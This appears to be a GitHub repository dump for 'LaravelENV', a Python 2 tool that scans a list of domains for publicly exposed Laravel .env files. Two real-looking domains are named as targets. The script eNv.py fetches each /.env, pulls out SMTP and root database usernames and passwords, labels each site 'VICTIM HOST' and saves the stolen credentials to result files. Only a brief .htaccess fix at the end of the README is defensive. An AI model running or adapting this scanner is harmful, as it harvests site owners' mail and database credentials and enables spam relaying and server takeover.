├── domains.txt
├── Screenshot
└── Laravel-Screenshot.png
├── README.md
└── eNv.py
/domains.txt:
--------------------------------------------------------------------------------
1 | www.cnt.com.br
2 | www.grupobh.cl
3 |
--------------------------------------------------------------------------------
/Screenshot/Laravel-Screenshot.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zerobyte-id-bak/LaravelENV/HEAD/Screenshot/Laravel-Screenshot.png
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # LaravelENV
2 |
3 | Environment Laravel used to store a configuration on the website.
4 |
5 | Example file .env :
6 | ```
7 | APP_ENV=local
8 | APP_KEY=base64:B6Oc3R8cYDv3tJXn26LlMKIhmZlItr84LDgdixSbKxQ=
9 | APP_DEBUG=true
10 | APP_LOG_LEVEL=debug
11 | APP_URL=http://localhost
12 |
13 | DB_CONNECTION=mysql
14 | DB_HOST=localhost
15 | DB_PORT=3306
16 | DB_DATABASE=database
17 | DB_USERNAME=udatabase
18 | DB_PASSWORD=pdatabase
19 |
20 | MAIL_DRIVER=smtp
21 | MAIL_HOST=boxxxx.bluehost.com
22 | MAIL_PORT=465
23 | MAIL_USERNAME=noreply@xxxxx.xxxx
24 | MAIL_PASSWORD=xxxxxx
25 | MAIL_ENCRYPTION=ssl
26 | ```
27 | This configuration can be used to retrieve SMTP / Database.
28 |
29 | ## How to use?
30 | $ python -V
31 |
32 | Python 2.7.12
33 |
34 | $ git clone https://github.com/zerobyte-id/LaravelENV.git
35 |
36 | $ cd LaravelENV/
37 |
38 | $ python eNv.py
39 |
40 | 
41 |
42 | ## How to secure .env file in laravel using file permission?
43 |
44 | Add this code in .htaccess file
45 | ```
46 |
47 | Order allow,deny
48 | Deny from all
49 |
50 | ```
51 | Reference : https://stackoverflow.com/questions/47352541/how-to-secure-env-file-in-laravel-using-file-permission
52 |
53 |
--------------------------------------------------------------------------------
/eNv.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # -*- coding: utf-8 -*-
3 | # Environment Laravel
4 | # [ GET SMTP & GET username ROOT (Maybe u can get it DATABASE or VPS) ]
5 | #
6 | # @Author : ZeroByte.ID
7 | # @Github : github.com/zerobyte-id
8 | #
9 | #
10 | import threading
11 | import requests
12 | import random
13 | import datetime
14 | import re
15 | from multiprocessing import Pool
16 | from multiprocessing.dummy import Pool as ThreadPool
17 | from time import time as timer
18 |
19 | class bcolors:
20 |
21 | HEADER = '\033[95m'
22 |
23 | OKBLUE = '\033[94m'
24 |
25 | OKGREEN = '\033[92m'
26 |
27 | WARNING = '\033[93m'
28 |
29 | FAIL = '\033[91m'
30 |
31 | ENDC = '\033[0m'
32 |
33 | BOLD = '\033[1m'
34 |
35 | WHITE = '\033[1;37m'
36 |
37 | print bcolors.WHITE
38 | print"""
39 | __ __
40 | / / ____ __________ __ _____ / /
41 | / / / __ `/ ___/ __ `/ | / / _ \/ /
42 | / /___/ /_/ / / / /_/ /| |/ / __/ /___
43 | /_____/\__,_/_/ \__,_/ |___/\___/_____/
44 | Environment
45 | -- ZeroByte.ID --"""
46 | print bcolors.FAIL + "[ * ] Get SMTP or Access root VPS / DATABASE [ * ]"
47 | print bcolors.ENDC
48 |
49 | def kuy(lEnVy):
50 |
51 | try:
52 | eNv = "http://{}/.env".format(lEnVy)
53 |
54 | headers = {
55 | 'Connection': 'keep-alive',
56 | 'Cache-Control': 'max-age=0',
57 | 'Upgrade-Insecure-Requests': '1',
58 | 'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36',
59 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
60 | 'Accept-Encoding': 'gzip, deflate',
61 | 'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
62 | }
63 |
64 | rsmTP = requests.get(eNv, headers=headers, allow_redirects=True, timeout=3)
65 |
66 | if "mailtrap.io" in rsmTP.text:
67 |
68 | print("\033[1;31;40m")
69 |
70 | print "[ - ] NOT FOUND SMTP [ - ] \n"
71 |
72 | elif rsmTP.status_code == 200:
73 |
74 | if "APP_NAME" in rsmTP.text:
75 |
76 | UEnVy.write(eNv + '\n')
77 |
78 | print("\033[1;32;40m")
79 |
80 | if "MAIL_HOST" in rsmTP.text:
81 |
82 | SMTP = re.findall('MAIL_HOST=(.*)', rsmTP.text)
83 |
84 | PORT = re.findall('MAIL_PORT=(.*)', rsmTP.text)
85 |
86 | USERNAME = re.findall('MAIL_USERNAME=(.*)', rsmTP.text)
87 |
88 | PASSWORD = re.findall('MAIL_PASSWORD=(.*)', rsmTP.text)
89 |
90 | MENCRYPTION = re.findall('MAIL_ENCRYPTION=(.*)', rsmTP.text)
91 |
92 | if "smtp.mailtrap.io" in SMTP:
93 |
94 | print("\033[1;31;40m")
95 |
96 | print "[ - ] NOT FOUND SMTP [ - ] \n"
97 |
98 | elif "localhost" in SMTP:
99 |
100 | print("\033[1;31;40m")
101 |
102 | print "[ - ] NOT FOUND SMTP [ - ] \n"
103 |
104 | elif "null" in SMTP:
105 |
106 | print("\033[1;31;40m")
107 |
108 | print "[ - ] NOT FOUND SMTP [ - ] \n"
109 |
110 | else:
111 |
112 | print "[ + ] FOUND SMTP [ + ]"
113 |
114 | print "\n= = = = = = = = = = = = = = = = = = = = = = = ="
115 |
116 | print "VICTIM HOST => {}".format(eNv)
117 |
118 | print "SMTP HOST => {}".format(SMTP[0])
119 |
120 | print "SMTP PORT => {}".format(PORT[0])
121 |
122 | print "SMTP USERNAME => {}".format(USERNAME[0])
123 |
124 | print "SMTP PASSWORD => {}".format(PASSWORD[0])
125 |
126 | print "SMTP ENCRYPTION => {}".format(MENCRYPTION[0])
127 |
128 | print "= = = = = = = = = = = = = = = = = = = = = = = ="
129 |
130 | SEnVy.write('VICTIM URL : ' + eNv + '\nSMTP HOST : ' + SMTP[0] + '\nSMTP PORT : ' + PORT[0] + '\nSMTP USER : ' + USERNAME[0] + '\nSMTP PASSWORD : ' + PASSWORD[0] + '\nSMTP ENCRYPTION : ' + MENCRYPTION[0] + '\n\n')
131 |
132 |
133 |
134 | elif "SMTP_HOST" in rsmTP.text:
135 |
136 | SMTP = re.findall('SMTP_HOST=(.*)', rsmTP.text)
137 |
138 | PORT = re.findall('SMTP_PORT=(.*)', rsmTP.text)
139 |
140 | USERNAME = re.findall('SMTP_USERNAME=(.*)', rsmTP.text)
141 |
142 | PASSWORD = re.findall('SMTP_PASSWORD=(.*)', rsmTP.text)
143 |
144 | MENCRYPTION = re.findall('SMTP_ENCRYPTION=(.*)', rsmTP.text)
145 |
146 | if "smtp.mailtrap.io" in SMTP:
147 |
148 | print("\033[1;31;40m")
149 |
150 | print "[ - ] NOT FOUND SMTP [ - ] \n"
151 |
152 | elif "localhost" in SMTP:
153 |
154 | print("\033[1;31;40m")
155 |
156 | print "[ - ] NOT FOUND SMTP [ - ] \n"
157 |
158 | elif "null" in SMTP:
159 |
160 | print("\033[1;31;40m")
161 |
162 | print "[ - ] NOT FOUND SMTP [ - ] \n"
163 |
164 | else:
165 |
166 | print "\n= = = = = = = = = = = = = = = = = = = = = = = ="
167 |
168 | print "VICTIM HOST => {}".format(eNv)
169 |
170 | print "SMTP HOST => {}".format(SMTP[0])
171 |
172 | print "SMTP PORT => {}".format(PORT[0])
173 |
174 | print "SMTP USERNAME => {}".format(USERNAME[0])
175 |
176 | print "SMTP PASSWORD => {}".format(PASSWORD[0])
177 |
178 | print "SMTP ENCRYPTION => {}".format(MENCRYPTION[0])
179 |
180 | print "= = = = = = = = = = = = = = = = = = = = = = = ="
181 |
182 | SEnVy.write('VICTIM URL : ' + eNv + '\nSMTP HOST : ' + SMTP[0] + '\nSMTP PORT : ' + PORT[0] + '\nSMTP USER : ' + USERNAME[0] + '\nSMTP PASSWORD : ' + PASSWORD[0] + '\nSMTP ENCRYPTION : ' + MENCRYPTION[0] + '\n\n')
183 |
184 | elif "mailtrap.io" in rsmTP.text:
185 |
186 | print("\033[1;31;40m")
187 |
188 | print "[ - ] NOT FOUND SMTP [ - ] \n"
189 |
190 | elif "DB_USERNAME=root" in rsmTP.text:
191 |
192 | ROOTU = re.findall('DB_USERNAME=(.*)', rsmTP.text)
193 |
194 | ROOTP = re.findall('DB_PASSWORD=(.*)', rsmTP.text)
195 |
196 | print bcolors.WARNING + "[ + ] Maybe you can get VPS / DATABASE [+]"
197 |
198 | REnVy.write('HOSTS : ' + lEnVy + '\nUSERNAME : ' + ROOTU[0] + '\nPASSWORD : ' + ROOTP[0] + '\n\n')
199 |
200 |
201 |
202 | elif rsmTP.status_code == 302:
203 |
204 | if "APP_NAME" in rsmTP.text:
205 |
206 | UEnVy.write(eNv + '\n')
207 |
208 | if "MAIL_HOST" in rsmTP.text:
209 |
210 | SMTP = re.findall('MAIL_HOST=(.*)', rsmTP.text)
211 |
212 | PORT = re.findall('MAIL_PORT=(.*)', rsmTP.text)
213 |
214 | USERNAME = re.findall('MAIL_USERNAME=(.*)', rsmTP.text)
215 |
216 | PASSWORD = re.findall('MAIL_PASSWORD=(.*)', rsmTP.text)
217 |
218 | MENCRYPTION = re.findall('MAIL_ENCRYPTION=(.*)', rsmTP.text)
219 |
220 | if "smtp.mailtrap.io" in SMTP:
221 |
222 | print("\033[1;31;40m")
223 |
224 | print "[ - ] NOT FOUND SMTP [ - ] \n"
225 |
226 | elif "localhost" in SMTP:
227 |
228 | print("\033[1;31;40m")
229 |
230 | print "[ - ] NOT FOUND SMTP [ - ] \n"
231 |
232 | elif "null" in SMTP:
233 |
234 | print("\033[1;31;40m")
235 |
236 | print "[ - ] NOT FOUND SMTP [ - ] \n"
237 |
238 | else:
239 |
240 | print "[ + ] FOUND SMTP [ + ]"
241 |
242 | print "\n= = = = = = = = = = = = = = = = = = = = = = = ="
243 |
244 | print "VICTIM HOST => {}".format(eNv)
245 |
246 | print "SMTP HOST => {}".format(SMTP[0])
247 |
248 | print "SMTP PORT => {}".format(PORT[0])
249 |
250 | print "SMTP USERNAME => {}".format(USERNAME[0])
251 |
252 | print "SMTP PASSWORD => {}".format(PASSWORD[0])
253 |
254 | print "SMTP ENCRYPTION => {}".format(MENCRYPTION[0])
255 |
256 | print "= = = = = = = = = = = = = = = = = = = = = = = ="
257 |
258 | SEnVy.write('VICTIM URL : ' + eNv + '\nSMTP HOST : ' + SMTP[0] + '\nSMTP PORT : ' + PORT[0] + '\nSMTP USER : ' + USERNAME[0] + '\nSMTP PASSWORD : ' + PASSWORD[0] + '\nSMTP ENCRYPTION : ' + MENCRYPTION[0] + '\n\n')
259 |
260 |
261 |
262 |
263 | elif "SMTP_HOST" in rsmTP.text:
264 |
265 | SMTP = re.findall('SMTP_HOST=(.*)', rsmTP.text)
266 |
267 | PORT = re.findall('SMTP_PORT=(.*)', rsmTP.text)
268 |
269 | USERNAME = re.findall('SMTP_USERNAME=(.*)', rsmTP.text)
270 |
271 | PASSWORD = re.findall('SMTP_PASSWORD=(.*)', rsmTP.text)
272 |
273 | MENCRYPTION = re.findall('SMTP_ENCRYPTION=(.*)', rsmTP.text)
274 |
275 | if "smtp.mailtrap.io" in SMTP:
276 |
277 | print("\033[1;31;40m")
278 |
279 | print "[ - ] NOT FOUND SMTP [ - ] \n"
280 |
281 | elif "localhost" in SMTP:
282 |
283 | print("\033[1;31;40m")
284 |
285 | print "[ - ] NOT FOUND SMTP [ - ] \n"
286 |
287 | elif "null" in SMTP:
288 |
289 | print("\033[1;31;40m")
290 |
291 | print "[ - ] NOT FOUND SMTP [ - ] \n"
292 |
293 | else:
294 |
295 | print "[ + ] FOUND SMTP [ + ]"
296 |
297 | print "\n= = = = = = = = = = = = = = = = = = = = = = = ="
298 |
299 | print "VICTIM HOST => {}".format(eNv)
300 |
301 | print "SMTP HOST => {}".format(SMTP[0])
302 |
303 | print "SMTP PORT => {}".format(PORT[0])
304 |
305 | print "SMTP USERNAME => {}".format(USERNAME[0])
306 |
307 | print "SMTP PASSWORD => {}".format(PASSWORD[0])
308 |
309 | print "SMTP ENCRYPTION => {}".format(MENCRYPTION[0])
310 |
311 | print "= = = = = = = = = = = = = = = = = = = = = = = ="
312 |
313 | SEnVy.write('VICTIM URL : ' + eNv + '\nSMTP HOST : ' + SMTP[0] + '\nSMTP PORT : ' + PORT[0] + '\nSMTP USER : ' + USERNAME[0] + '\nSMTP PASSWORD : ' + PASSWORD[0] + '\nSMTP ENCRYPTION : ' + MENCRYPTION[0] + '\n\n')
314 |
315 |
316 | elif "DB_USERNAME=root" in rsmTP.text:
317 |
318 | ROOTU = re.findall('DB_USERNAME=(.*)', rsmTP.text)
319 |
320 | ROOTP = re.findall('DB_PASSWORD=(.*)', rsmTP.text)
321 |
322 | print bcolors.WARNING + "[ + ] Maybe you can get VPS / DATABASE [+]"
323 |
324 | REnVy.write('HOSTS : ' + lEnVy + '\nUSERNAME : ' + ROOTU[0] + '\nPASSWORD : ' + ROOTP[0] + '\n\n')
325 |
326 | else:
327 |
328 | print bcolors.FAIL + "[ - ] CAN'T FOUND BUG [ - ]"
329 |
330 | except:
331 |
332 | pass
333 |
334 |
335 | def Main():
336 |
337 |
338 | try:
339 |
340 | start = timer()
341 |
342 | pp = ThreadPool(6)
343 |
344 | pr = pp.map(kuy, lEnVy)
345 |
346 | print bcolors.ENDC
347 |
348 | print('Time: ' + str(timer() - start) + ' seconds')
349 |
350 | pr.join()
351 |
352 | except:
353 |
354 | pass
355 |
356 | try:
357 |
358 | li = raw_input(" [ - ] Input your file domain list : ")
359 |
360 | lEnVy = open(li, "r").read().split()
361 |
362 | lEnVy.sort() # Sort (A - Z)
363 |
364 | except IOError:
365 |
366 | pass
367 |
368 | bNyak = len(list(lEnVy)) # Banyak line
369 |
370 | print " [ + ] Total Domain : {} \n".format(bNyak)
371 | SEnVy = open("SMTP-Result.txt", 'w')
372 | REnVy = open("ROOT-Result.txt", 'w')
373 | UEnVy = open("ENV-URL-Result.txt", 'w')
374 | Main()
375 | SEnVy.close()
376 | REnVy.close()
377 | UEnVy.close()
378 |
--------------------------------------------------------------------------------